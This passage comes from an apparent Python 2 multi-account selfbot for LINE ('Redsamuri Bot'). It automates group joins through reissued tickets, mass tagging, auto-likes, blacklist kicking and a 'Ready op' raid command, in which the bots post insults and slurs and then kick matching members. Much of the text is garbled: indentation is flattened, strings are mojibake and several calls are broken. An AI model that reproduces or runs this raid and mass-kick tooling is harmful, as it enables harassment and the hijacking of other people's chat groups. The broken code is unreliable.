#cl.sendText(msg.to,"kick Joined Group Off")
#else:
#cl.sendText(msg.to,"done")
#else:
#wait["Protectjoin"] = False
#if wait["lang"] == "JP":
#cl.sendText(msg.to,"kick Joined Group Off")
#else:
#cl.sendText(msg.to,"done")
elif msg.text in ["Allprotect on","Red on"]:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Kick Joined Group On")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Udah On")
else:
cl.sendText(msg.to,"Udah On")
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Invit On")
else:
cl.sendText(msg.to,"Invit on")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Invit On")
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Cancel On")
else:
cl.sendText(msg.to,"Cancel on")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Cancel On")
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect On")
else:
cl.sendText(msg.to,"Done")
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect On")
else:
cl.sendText(msg.to,"Done")
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Link On")
else:
cl.sendText(msg.to,"Link On")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Link On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Allprotect off","Red off"]:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group Off")
else:
cl.sendText(msg.to,"Kick Joined Gtoup Off�")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Udah Mati Gblk")
else:
cl.sendText(msg.to,"Udah Mati Gblk")
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Invite Off")
else:
cl.sendText(msg.to,"Invite OFF")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Invite Off")
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Cancel Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Cancel Off")
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Block Off")
else:
cl.sendText(msg.to,"done")
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Block Off")
else:
cl.sendText(msg.to,"done")
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel on","cancel on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr on","qr on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr off","qr off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact On","Contact on","contact on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact Off","Contact off","contact off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オン","Join on","Auto join on","自動å�ƒåŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オフ","Join off","Auto join off","自動å�ƒåŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gcancel:"]:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒�。�时开请指定人数��")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的�组用自动邀请拒�")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["強制自動退出:オン","Leave on","Auto leave:on","強制自動退出:開"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["強制自動退出:オフ","Leave off","Auto leave:off","強制自動退出:關"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["Reject","ลบรัน"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปฏิเสทคำเชิญเข้ากลุ่มทั้งหมดเรียบร้อย")
else:
cl.sendText(msg.to,"คำสั่งสำหรับ แอดมิน")
elif msg.text in ["共有:オン","Share on","Share on"]:
if msg.from_ in admin:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["共有:オフ","Share off","Share off"]:
if msg.from_ in admin:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Status","Set"]:
if msg.from_ in admin:
md = "⭐Status Proteksi⭐\n*============*\n"
if wait["Protectgr"] == True: md+="[•]Protect QR [On]\n"
else: md+="[•]Protect QR [Off]\n"
if wait["Protectcancl"] == True: md+="[•]Protect Invite [On]\n"
else: md+="[•]Protect Invite [Off]\n"
if wait["contact"] == True: md+="[•]Contact [On]\n"
else: md+="[•]Contact [Off]\n"
if wait["autoJoin"] == True: md+="[•]Auto Join [On]\n"
else: md +="[•]Auto Join [Off]\n"
if wait["autoCancel"]["on"] == True:md+="[•]Group Cancel " + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "[•]Group Cancel [Off]\n"
if wait["leaveRoom"] == True: md+="[•]Auto Leave [On]\n"
else: md+=" Auto Leave [Off]\n"
if wait["timeline"] == True: md+="[•]Share [On]\n"
else:md+="[•]Share [Off]\n"
if wait["autoAdd"] == True: md+="[•]Auto Add [On]\n"
else:md+="[•]Auto Add [Off]\n"
if wait["commentOn"] == True: md+="[•]Comment [On]\n"
else:md+="[•]Comment [Off]\n*============*\n⭐Redsamuri Bot⭐\n*============*"
cl.sendText(msg.to,md)
elif "album merit " in msg.text:
gid = msg.text.replace("album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
elif "album " in msg.text:
gid = msg.text.replace("album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
elif "album remove " in msg.text:
gid = msg.text.replace("album remove ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Group id"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:\n%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["Cancelall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"拒�了全部的邀请。")
elif "album removeat’" in msg.text:
gid = msg.text.replace("album removeat’","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オン","Add on","Auto add:on","è‡ªå‹•è¿½åŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"Done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オフ","Add off","Auto add:off","è‡ªå‹•è¿½åŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif "Message change: " in msg.text:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "Message add: " in msg.text:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"done。")
elif msg.text in ["Message","è‡ªå‹•è¿½åŠ å•�候語確èª�"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
#---------------------Sc invite owner ke group------
elif "/invitemeto: " in msg.text:
if msg.from_ in owner:
gid = msg.text.replace("/invitemeto: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#--------===---====--------------
elif msg.text in ["コメント:オン","Comment on","Comment:on","自動首é �留言:開"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["コメント:オフ","Comment off","comment off","自動首é �留言:關"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Comment","留言確�"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Red1 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Red2 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kk.updateGroup(x)
gurl = kk.reissueGroupTicket(msg.to)
kk.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Red3 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kc.updateGroup(x)
gurl = kc.reissueGroupTicket(msg.to)
kc.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Jam on/off Start-------------------#
elif msg.text in ["Jam on"]:
if msg.from_ in admin:
if wait["clock"] == True:
kc.sendText(msg.to,"Bot 4 jam on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Jam Selalu On")
elif msg.text in ["Jam off"]:
if msg.from_ in admin:
if wait["clock"] == False:
kc.sendText(msg.to,"Bot 4 jam off")
else:
wait["clock"] = False
kc.sendText(msg.to,"Jam Sedang Off")
#-------------Fungsi Jam on/off Finish-------------------#
#-------------Fungsi Change Clock Start------------------#
elif msg.text in ["Change clock"]:
n = msg.text.replace("Change clock","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
#-------------Fungsi Change Clock Finish-----------------#
#-------------Fungsi Jam Update Start---------------------#
elif msg.text in ["Jam Update"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Sukses update")
else:
kc.sendText(msg.to,"Aktifkan jam terlebih dulu")
#-------------Fungsi Jam Update Finish-------------------#
elif msg.text == "จับ":
if msg.from_ in admin:
cl.sendText(msg.to, "จับตาดูคนแอบแล้ว")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
wait2['ROM'][msg.to] = {}
#print wait2
elif msg.text == "อ่าน":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
#print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "||จับตาดูคนแอบ||%s\n||By : Redsamuri BOT||\n%s-=ชื่อของคนแอบมีดังนี้=-\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, " Redsamuri\nอ่าน\n ได้เท่านี้♪")
#-----------------------------------------------
#-----------------------------------------------
#----------------Fungsi Join Group Start-----------------------#
# --- "เข้ามา" / "Red samuri" / "Join all" : pull every slave bot into this group ---
# Flow: temporarily open the group's ticket-join gate, reissue a ticket,
# have each slave account (ki, kk, kc, ks) join via that ticket, then close
# the gate again so the ticket cannot be abused by strangers.
elif msg.text in ["เข้ามา","Red samuri","Join all"]: # Panggil Semua Bot ("summon all bots")
    if msg.from_ in owner:
        G = cl.getGroup(msg.to)
        ginfo = cl.getGroup(msg.to)
        G.preventJoinByTicket = False          # open ticket-based joining
        cl.updateGroup(G)
        invsend = 0
        Ticket = cl.reissueGroupTicket(msg.to)
        ki.acceptGroupInvitationByTicket(msg.to,Ticket)
        time.sleep(0.01)                       # brief pause between joins (rate limiting)
        kk.acceptGroupInvitationByTicket(msg.to,Ticket)
        time.sleep(0.01)
        kc.acceptGroupInvitationByTicket(msg.to,Ticket)
        time.sleep(0.01)
        ks.acceptGroupInvitationByTicket(msg.to,Ticket)
        time.sleep(0.01)
        G = cl.getGroup(msg.to)
        ginfo = cl.getGroup(msg.to)
        G.preventJoinByTicket = True           # close ticket-based joining again
        cl.updateGroup(G)
        print "Semua Sudah Lengkap"
elif msg.text in ["Redsamuri join"]:
if msg.form_ in admin:
x = ki.getGroup(msg.to)
x.preventJoinByTicket = False
ki.updateGroup(x)
invsend = 0
Ti = ki.reissueGroupTicket(msg.to)
cl.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(msg.to)
elif msg.text in ["Red1 join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Red2 join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Red3 Join"]:
if msg.from_ in admin:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Red4 Join"]:
if msg.from_ in admin:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ks.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#----------------------Fungsi Join Group Finish---------------#
#-------------Fungsi Leave Group Start---------------#
elif msg.text in ["Bye Red","Bye all","bye all"]: #Bot Ninggalin Group termasuk Bot Induk
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["ออก"]: #Semua Bot Ninggalin Group Kecuali Bot Induk
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
#cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Red1"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Red2"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Red3"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Red4"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ks.leaveGroup(msg.to)
except:
pass
elif msg.text in ["1ออก"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["2ออก"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["3ออก"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["4ออก"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ks.leaveGroup(msg.to)
except:
pass
#-------------Fungsi Leave Group Finish---------------#
#-------------Fungsi Tag All Start---------------#
# --- "Tag all" / "Tagall" : @-mention every member of the group ---
# Builds one message whose MENTION contentMetadata maps character offsets in
# the visible text to member mids. Each member contributes the 7-character
# chunk "@nrik \n"; strt/akh track the start/end offsets of each mention.
elif msg.text in ["Tag all","Tagall"]:
    if msg.from_ in admin:
        group = cl.getGroup(msg.to)
        nama = [contact.mid for contact in group.members]
        cb = ""      # accumulated JSON fragments for the MENTIONEES array
        cb2 = ""     # accumulated visible message text
        strt = int(0)    # start offset of the current mention span
        akh = int(0)     # end offset of the current mention span
        for md in nama:
            akh = akh + int(6)
            cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
            strt = strt + int(7)     # advance past "@nrik \n" (7 chars)
            akh = akh + 1
            cb2 += "@nrik \n"
        cb = (cb[:int(len(cb)-1)])   # drop the trailing comma
        msg.contentType = 0          # plain text message carrying mention metadata
        msg.text = cb2
        msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
        try:
            cl.sendMessage(msg)
        except Exception as error:
            print error
#-------------Fungsi Tag All Finish---------------#
elif msg.text in ["Bot Like", "Bot like"]: #Semua Bot Ngelike Status Akun Utama
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Redsamuribot Like Status Owner")
try:
likePost()
except:
pass
elif msg.text in ["Like temen", "Bot like temen"]: #Semua Bot Ngelike Status Teman
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Redsamuri Bot Like Status Teman Boss")
cl.sendText(msg.to,"Redsamuri Bot Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
autolike()
except:
pass
#----------------Fungsi Banned Kick Target Start-----------------------#
# --- "Kill " : kick every blacklisted member currently in this group ---
# Scans the group's member list against wait["blacklist"] and kicks each
# match, using a randomly chosen bot account per kick (presumably to spread
# rate limits across accounts — TODO confirm).
elif msg.text in ["Kill "]:
    if msg.from_ in admin:
        if msg.toType == 2:    # 2 = group chat
            group = random.choice(KAC).getGroup(msg.to)
            gMembMids = [contact.mid for contact in group.members]
            matched_list = []
            # collect group members whose mid appears in the blacklist
            # (note: the lambda parameter shadows the builtin `str`)
            for tag in wait["blacklist"]:
                matched_list+=filter(lambda str: str == tag, gMembMids)
            if matched_list == []:
                random.choice(KAC).sendText(msg.to,"ขับไล่รายการที่ถูกแบน")
                random.choice(KAC).sendText(msg.to,"Redbot Invite devil smile")
                return    # nothing to kick; stop handling this message
            for jj in matched_list:
                try:
                    klist=[cl,ki,kk,kc,ks]
                    kicker=random.choice(klist)
                    kicker.kickoutFromGroup(msg.to,[jj])
                    print (msg.to,[jj])
                except:
                    # kick may fail (already removed / no permission); keep going
                    pass
#----------------Fungsi Banned Kick Target Finish----------------------#
elif "Ready op" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Ready op","")
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
random.choice(KAC).sendText(msg.to,"Eh Kontol Ini Room apaan?")
random.choice(KAC).sendText(msg.to,"Ratain aja lah\nRoom Ga Berguna..")
random.choice(KAC).sendText(msg.to,"Jangan Baper yah Tollll;")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
random.choice(KAC).sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
if target in Bots:
pass
elif target in admin:
pass
else:
try:
klist=[cl,ki,kk,kc,ks]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Koq Ga Ditangkis Njiiing?\nLemah Banget Nih Room")
#----------------Fungsi Kick User Target Start----------------------#
elif "Nk " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
#----------------Fungsi Kick User Target Finish----------------------#
elif "Blacklist @ " in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Blacklist @ ","")
_kicktarget = _name.rstrip(' ')
gs = random.choice(KAC).getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
